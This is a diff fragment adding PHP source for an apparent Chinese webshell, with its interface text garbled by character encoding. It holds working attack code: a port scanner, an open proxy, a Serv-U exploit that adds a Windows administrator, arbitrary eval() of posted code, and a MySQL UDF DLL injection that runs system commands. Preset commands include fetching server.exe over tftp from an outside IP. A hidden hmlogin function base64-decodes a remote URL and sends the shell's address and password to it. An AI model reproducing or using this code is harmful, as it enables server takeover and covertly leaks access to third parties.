+<form method="POST">
+<div class="actall">ɨ��IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
+<div class="actall">�˿ں� <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
+<div class="actall"><input type="submit" value="ɨ��" style="width:80px;"></div>
+</form>
+END;
+	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
+	{
+		echo '<div class="actall">';
+		$ports = explode('|', $_POST['port']);
+		for($i = 0;$i < count($ports);$i++)
+		{
+			$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
+			echo $fp ? '<font color="#FF0000">���Ŷ˿� ---> '.$ports[$i].'</font><br>' : '�رն˿� ---> '.$ports[$i].'<br>';
+			ob_flush();
+			flush();
+		}
+		echo '</div>';
+	}
+	break;
+	
+
+	case "getcode":
+if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>��ȡ URL ����ʧ��</b></p></center></body>";exit;}
+print<<<END
+<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
+ <form method="POST" target="proxyframe">
+  <tr class="firstalt">
+	<td align="center"><b>���ߴ���</b></td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><br><ul><li>�ñ����ܽ�ʵ�ּ򵥵� HTTP ����,������ʾʹ�����·����ͼƬ�����Ӽ�CSS��ʽ��.</li><li>�ñ����ܿ���ͨ�������������Ŀ��URL,����֧�� SQL Injection ̽���Լ�ijЩ�����ַ�.</li><li>�ñ���������� URL,��Ŀ�����������µ�IP��¼�� : {$_SERVER['SERVER_NAME']}</li></ul></td>
+  </tr>
+  <tr class="firstalt">
+	<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >
+ <input name="" value="���" type="submit"  class="input" size="30" >
+</td>
+  </tr>
+  <tr class="secondalt">
+	<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
+  </tr>
+</form></table>
+END;
+	break;
+	
+	case "servu":
+	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
+print<<<END
+<div class="actall"><a href="?eanver=servu">[ִ������]</a> <a href="?eanver=servu&o=adduser">[�����û�]</a></div>
+<form method="POST">
+	<div class="actall">ServU�˿� <input name="SUPort" type="text" value="43958" style="width:300px"></div>
+	<div class="actall">ServU�û� <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
+	<div class="actall">ServU���� <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
+END;
+if($_GET['o'] == 'adduser')
+{
+print<<<END
+<div class="actall">�ʺ� <input name="user" type="text" value="envl" style="width:200px">
+���� <input name="password" type="text" value="envl" style="width:200px">
+Ŀ¼ <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
+END;
+}
+else
+{
+print<<<END
+<div class="actall">��Ȩ���� <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>
+<input name="user" type="hidden" value="envl">
+<input name="password" type="hidden" value="envl">
+<input name="part" type="hidden" value="C:\\\\"></div>
+END;
+}
+echo '<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>';
+	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
+	{
+		echo '<div class="actall">';
+		$sendbuf = "";
+		$recvbuf = "";
+		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
+		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
+							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
+							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
+		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
+		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = "SITE MAINTENANCE\r\n";
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $domain;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		$sendbuf = $adduser;
+		@fputs($sock, $sendbuf, strlen($sendbuf));
+		echo "�������ݰ�: $sendbuf <br>";
+		$recvbuf = @fgets($sock, 1024);
+		echo "�������ݰ�: $recvbuf <br>";
+		if(!empty($_POST['SUCommand']))
+		{
+	 		$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "USER ".$_POST['user']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "PASS ".$_POST['password']."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
+	 		@fputs($exp, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
+	 		$recvbuf = @fgets($exp, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		$sendbuf = $deldomain;
+	 		@fputs($sock, $sendbuf, strlen($sendbuf));
+	 		echo "�������ݰ�: $sendbuf <br>";
+	 		$recvbuf = @fgets($sock, 1024);
+	 		echo "�������ݰ�: $recvbuf <br>";
+	 		@fclose($exp);
+		}
+		@fclose($sock);
+		echo '</div>';
+	}
+	break;
+	
+	case "eval":
+	$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
+	html_n('<tr><td><form method="POST">����д&lt;? ?&gt;��ǩ');
+	html_text("phpcode","70","15",$phpcode);
+	html_input("submit","eval","ִ��","<br><br>");
+	if(!empty($_POST['eval'])){
+	echo "<br><br>";
+    eval(stripslashes($phpcode));
+	}
+	html_n('</form>');
+	break;
+
+	case "myexp":
+	$MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.';
+	$info = '�������';
+	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
+	if(isset($_POST['mhost']) && isset($_POST['muser']))
+	{
+		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
+		$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
+		if($conn)
+		{
+			@mysql_select_db($mdata);
+			if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
+			{
+				$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
+				if(@mysql_query($query,$conn))
+				{
+					$shellcode = Mysql_shellcode();
+					$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
+					if(@mysql_query($query,$conn))
+					{
+						$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
+						if(@mysql_query($query,$conn))
+						{
+							$ap = explode('/', $mpath); $inpath = array_pop($ap);
+							$query = 'Create Function state returns string soname \''.$inpath.'\';';
+							$MSG_BOX = @mysql_query($query,$conn) ? '��װDLL�ɹ�' : '��װDLLʧ��';
+						}
+						else $MSG_BOX = '����DLL�ļ�ʧ��';
+					}
+					else $MSG_BOX = 'д����ʱ��ʧ��';
+					@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
+				}
+				else $MSG_BOX = '������ʱ��ʧ��';
+			}
+			if(!empty($_POST['runcmd']))
+			{
+				$query = 'select state("'.$sqlcmd.'");';
+				$result = @mysql_query($query,$conn);
+				if($result)
+				{
+					$k = 0; $info = NULL;
+					while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
+					$info = $infotmp;
+					$MSG_BOX = 'ִ�гɹ�';
+				}
+				else $MSG_BOX = 'ִ��ʧ��';
+			}
+		}
+		else $MSG_BOX = '����MYSQLʧ��';
+	}
+print<<<END
+<script language="javascript">
+function Fullm(i){
+	Str = new Array(11);
+	Str[0] = "ver";
+	Str[1] = "net user envl envl /add";
+	Str[2] = "net localgroup administrators envl /add";
+	Str[3] = "net start Terminal Services";
+	Str[4] = "tasklist /svc";
+	Str[5] = "netstat -ano";
+	Str[6] = "ipconfig";
+	Str[7] = "net user guest /active:yes";
+	Str[8] = "copy c:\\\\1.php d:\\\\2.php";
+	Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
+	Str[10] = "net start telnet";
+	Str[11] = "shutdown -r -t 0";
+	mform.sqlcmd.value = Str[i];
+	return true;
+}
+</script>
+<form id="mform" method="POST">
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<center><div class="actall">
+��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">
+�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">
+�û� <input type="text" name="muser" value="{$muser}" style="width:110px">
+���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">
+���� <input type="text" name="mdata" value="{$mdata}" style="width:110px">
+</div><div class="actall">
+�ɼ���·�� <input type="text" name="mpath" value="{$mpath}" style="width:555px"> 
+<input type="submit" name="outdll" value="��װDLL" style="width:80px;"></div>
+<div class="actall">��װ�ɹ������ <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">
+<select onchange="return Fullm(options[selectedIndex].value)">
+<option value="0" selected>--�����--</option>
+<option value="1">���ӹ���Ա</option>
+<option value="2">��������</option>
+<option value="3">����Զ������</option>
+<option value="4">�鿴���̺�PID</option>
+<option value="5">�鿴�˿ں�PID</option>
+<option value="6">�鿴IP</option>
+<option value="7">����guest�ʻ�</option>
+<option value="8">�����ļ�</option>
+<option value="9">ftp����</option>
+<option value="10">����telnet</option>
+<option value="11">����</option>
+</select>
+<input type="submit" name="runcmd" value="ִ��" style="width:80px;">
+<textarea style="width:720px;height:300px;">{$info}</textarea>
+</div></center>
+</form>
+END;
+	break;
+	
+
+	case "mysql_exec":
+  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
+  {
+  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
+	  {
+	  	$cookietime = time() + 24 * 3600;
+	  	setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
+	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);
+	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);
+	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
+	  	die('���ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
+	  }
+  }
+print<<<END
+<form method="POST" name="oform" id="oform">
+<div class="actall">��ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>
+<div class="actall">�˿� <input type="text" name="mport" value="3306" style="width:300px"></div>
+<div class="actall">�û� <input type="text" name="muser" value="root" style="width:300px"></div>
+<div class="actall">���� <input type="text" name="mpass" value="" style="width:300px"></div>
+<div class="actall"><input type="submit" value="��½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
+</form>
+END;
+break;
+
+case "mysql_msg":
+	$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
+	if($conn)
+	{
+print<<<END
+<script language="javascript">
+function Delok(msg,gourl)
+{
+	smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+	if(confirm(smsg)){window.location = gourl;}
+}
+function Createok(ac)
+{
+	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
+	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
+	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
+	return false;
+}
+</script>
+END;
+		$BOOL = false;
+		$MSG_BOX = '�û�:'.$_COOKIE['m_eanveruser'].' &nbsp;&nbsp;&nbsp;&nbsp; ��ַ:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &nbsp;&nbsp;&nbsp;&nbsp; �汾:';
+		$k = 0;
+		$result = @mysql_query('select version();',$conn);
+		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
+		echo '<div class="actall"> ���ݿ�:';
+		$result = mysql_query("SHOW DATABASES",$conn);
+		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
+		echo '</div>';
+		if(isset($_GET['db']))
+		{
+			mysql_select_db($_GET['db'],$conn);
+			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� '.mysql_error();}
+			if(is_array($_POST['insql']))
+			{
+				$query = 'INSERT INTO '.$_GET['table'].' (';
+				foreach($_POST['insql'] as $var => $key)
+				{
+					$querya .= $var.',';
+					$queryb .= '\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
+				$MSG_BOX = mysql_query($query,$conn) ? '���ӳɹ�' : '����ʧ�� '.mysql_error();
+			}
+			if(is_array($_POST['upsql']))
+			{
+				$query = 'UPDATE '.$_GET['table'].' SET ';
+				foreach($_POST['upsql'] as $var => $key)
+				{
+					$queryb .= $var.'=\''.addslashes($key).'\',';
+				}
+				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
+				$MSG_BOX = mysql_query($query,$conn) ? '�޸ijɹ�' : '�޸�ʧ�� '.mysql_error();
+			}
+			if(isset($_GET['del']))
+			{
+				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
+				$good = mysql_fetch_assoc($result);
+				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
+				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
+				$where = $query.substr($queryc, 0, -4).';';
+				$MSG_BOX = mysql_query($where,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();
+			}
+			$action = '?eanver=mysql_msg&db='.$_GET['db'];
+			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� '.mysql_error();}
+			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
+			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
+			echo '<div class="actall"><form method="POST" action="'.$action.'">';
+			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
+			echo '<input type="submit" name="querysql" value="ִ��" style="width:60px;height:49px;"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
+			echo '<input type="button" value="������" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
+			echo '<input type="button" value="ɾ����" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
+			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
+			if(isset($_GET['table']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
+				echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'">����</a>]</div>';
+				if(isset($_GET['edit']))
+				{
+					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
+					echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
+					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
+					$good = mysql_fetch_assoc($result);
+					$u = 0;
+					foreach($good as $var => $key)
+					{
+						$queryc .= $var.'=\''.$key.'\' AND ';
+						$type = @mysql_field_type($result, $u);
+						$len = @mysql_field_len($result, $u);
+						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
+						$u++;
+					}
+					$where = 'WHERE '.substr($queryc, 0, -4);
+					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
+					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
+				}
+				else
+				{
+					$query = 'SHOW COLUMNS FROM '.$_GET['table'];
+		      $result = mysql_query($query,$conn);
+		      $fields = array();
+			  $pagesize=20;
+		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
+			  $numrows=$row_num;
+              $pages=intval($numrows/$pagesize);
+              if ($numrows%$pagesize) $pages++;
+              $offset=$pagesize*($page - 1);
+              $page=$_GET['p'];
+              if(!$page) $page=1;
+
+		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
+					echo '<table border="0"><tr>';
+					echo '<td class="toptd" style="width:70px;" nowrap>����</td>';
+					while($row = @mysql_fetch_assoc($result))
+					{
+						array_push($fields,$row['Field']);
+						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
+					}
+					echo '</tr>';
+					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
+					$result = mysql_query($query,$conn);
+					$v = $p;
+					while($text = @mysql_fetch_assoc($result))
+					{
+						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> �޸� </a> ';
+						echo '<a href="#" onclick="Delok(\'��\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> ɾ�� </a></td>';
+						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
+						echo '</tr>'."\r\n";$v++;
+					}
+					echo '</table><div class="actall">';
+                    $pagep=$page-1;
+                    $pagen=$page+1;
+                    echo "���� ".$row_num." ����¼ ";
+                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'>��ҳ</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'>��һҳ</a> "; else $pagenav.=" ��һҳ ";
+                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'>��һҳ</a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'>βҳ</a>"; else $pagenav.=" ��һҳ ";
+                    $pagenav.=" �� [".$page."/".$pages."] ҳ   ����<input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />ҳ";
+                    echo $pagenav;
+					echo '</div>';
+				}
+			}
+			elseif(isset($_GET['insert']))
+			{
+				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
+				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
+				$fieldnum = @mysql_num_fields($result);
+				echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
+				for($i = 0;$i < $fieldnum;$i++)
+				{
+					$name = @mysql_field_name($result, $i);
+					$type = @mysql_field_type($result, $i);
+					$len = @mysql_field_len($result, $i);
+					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
+				}
+				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
+			}
+			else
+			{
+				$query = 'SHOW TABLE STATUS';
+				$status = @mysql_query($query,$conn);
+				while($statu = @mysql_fetch_array($status))
+				{
+					$statusize[] = $statu['Data_length'];
+					$statucoll[] = $statu['Collation'];
+				}
+				$query = 'SHOW TABLES FROM '.$_GET['db'].';';
+				echo '</div><table border="0"><tr>';
+				echo '<td class="toptd" style="width:550px;"> ���� </td>';
+				echo '<td class="toptd" style="width:80px;"> ���� </td>';
+				echo '<td class="toptd" style="width:130px;"> �ַ��� </td>';
+				echo '<td class="toptd" style="width:70px;"> ��С </td></tr>';
+				$result = @mysql_query($query,$conn);
+				$k = 0;
+				while($table = mysql_fetch_row($result))
+				{
+					$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
+					echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
+					echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> ���� </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> ɾ�� </a></td>';
+					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
+					$k++;
+				}
+				echo '</table>';
+			}
+		}
+	}
+	else die('����MYSQLʧ��,�����µ�½.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
+	if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
+break;
+
+	
+	default: html_main($path,$shellname); break;
+}
+css_foot();
+
+/*---doing---*/
+
+function do_write($file,$t,$text)
+{
+	$key = true;
+	$handle = @fopen($file,$t);
+	if(!@fwrite($handle,$text))
+	{
+		@chmod($file,0666);
+		$key = @fwrite($handle,$text) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function do_show($filepath){
+	$show = array();
+	$dir = dir($filepath);
+	while($file = $dir->read()){
+		if($file == '.' or $file == '..') continue;
+		$files = str_path($filepath.'/'.$file);
+		$show[] = $files;
+	}
+	$dir->close();
+	return $show;
+}
+
+function do_deltree($deldir){
+	$showfile = do_show($deldir);
+	foreach($showfile as $del){
+		if(is_dir($del)){ 
+			if(!do_deltree($del)) return false;
+		}elseif(!is_dir($del)){
+			@chmod($del,0777);
+			if(!@unlink($del)) return false;
+		}
+	}
+	@chmod($deldir,0777);
+	if(!@rmdir($deldir)) return false;
+	return true;
+}
+
+function do_showsql($query,$conn){
+	$result = @mysql_query($query,$conn);
+	html_n('<br><br><textarea cols="70" rows="15">');
+	while($row = @mysql_fetch_array($result)){
+		for($i=0;$i < @mysql_num_fields($result);$i++){
+			html_n(htmlspecialchars($row[$i]));
+		}
+	}
+	html_n('</textarea>');
+}
+
+function hmlogin($xiao=1){
+    @set_time_limit(10);
+	$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+    $serverp = envlpass;
+    $copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
+    $url=$copyurl.$serveru.'&p='.$serverp;
+    $url=urldecode($url);
+    $re=file_get_contents($url);
+
+$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
+$serverp = envlpass;
+if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
+}
+
+function do_down($fd){
+	if(!@file_exists($fd)) msg('�����ļ�������');
+	$fileinfo = pathinfo($fd);
+	header('Content-type: application/x-'.$fileinfo['extension']);
+	header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+	header('Content-Length: '.filesize($fd));
+	@readfile($fd);
+	exit;
+}
+
+function do_download($filecode,$file){
+	header("Content-type: application/unknown");
+	header('Accept-Ranges: bytes');
+	header("Content-length: ".strlen($filecode));
+	header("Content-disposition: attachment; filename=".$file.";");
+	echo $filecode;
+	exit;
+}
+
+function TestUtf8($text)
+{if(strlen($text) < 3) return false;
+$lastch = 0;
+$begin = 0;
+$BOM = true;
+$BOMchs = array(0xEF, 0xBB, 0xBF);
+$good = 0;
+$bad = 0;
+$notAscii = 0;
+for($i=0; $i < strlen($text); $i++)
+{$ch = ord($text[$i]);
+if($begin < 3)
+{ $BOM = ($BOMchs[$begin]==$ch);
+$begin += 1;
+continue; }
+if($begin==4 && $BOM) break;
+if($ch >= 0x80 ) $notAscii++;
+if( ($ch&0xC0) == 0x80 )
+{if( ($lastch&0xC0) == 0xC0 )
+{$good += 1;}
+else if( ($lastch&0x80) == 0 )
+{$bad += 1; }}
+else if( ($lastch&0xC0) == 0xC0 )
+{$bad += 1;}
+$lastch = $ch;}
+if($begin == 4 && $BOM)
+{return 2;}
+else if($notAscii==0)
+{return 1;}
+else if ($good >= $bad )
+{return 2;}
+else
+{return 0;}}
+
+function File_Str($string)
+{
+	return str_replace('//','/',str_replace('\\','/',$string));
+}
+
+function File_Write($filename,$filecode,$filemode)
+{
+	$key = true;
+	$handle = @fopen($filename,$filemode);
+	if(!@fwrite($handle,$filecode))
+	{
+		@chmod($filename,0666);
+		$key = @fwrite($handle,$filecode) ? true : false;
+	}
+	@fclose($handle);
+	return $key;
+}
+
+function File_Mode()
+{
+	$RealPath = realpath('./');
+	$SelfPath = $_SERVER['PHP_SELF'];
+	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
+
+function File_Size($size)
+{ 
+        $kb = 1024;         // Kilobyte
+        $mb = 1024 * $kb;   // Megabyte
+        $gb = 1024 * $mb;   // Gigabyte
+        $tb = 1024 * $gb;   // Terabyte
+        if($size < $kb)
+        {
+            return $size." B";
+        }
+        else if($size < $mb)
+        { 
+            return round($size/$kb,2)." K";
+        }
+        else if($size < $gb)
+        { 
+            return round($size/$mb,2)." M";
+        }
+        else if($size < $tb)
+        { 
+            return round($size/$gb,2)." G";
+        }
+        else
+        { 
+            return round($size/$tb,2)." T";
+        }
+ }
+
+function File_Read($filename)
+{
+	$handle = @fopen($filename,"rb");
+	$filecode = @fread($handle,@filesize($filename));
+	@fclose($handle);
+	return $filecode;
+}
+
+function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
+function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
+
+function do_phpfun($cmd,$fun) {
+	$res = '';
+	switch($fun){
+		case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
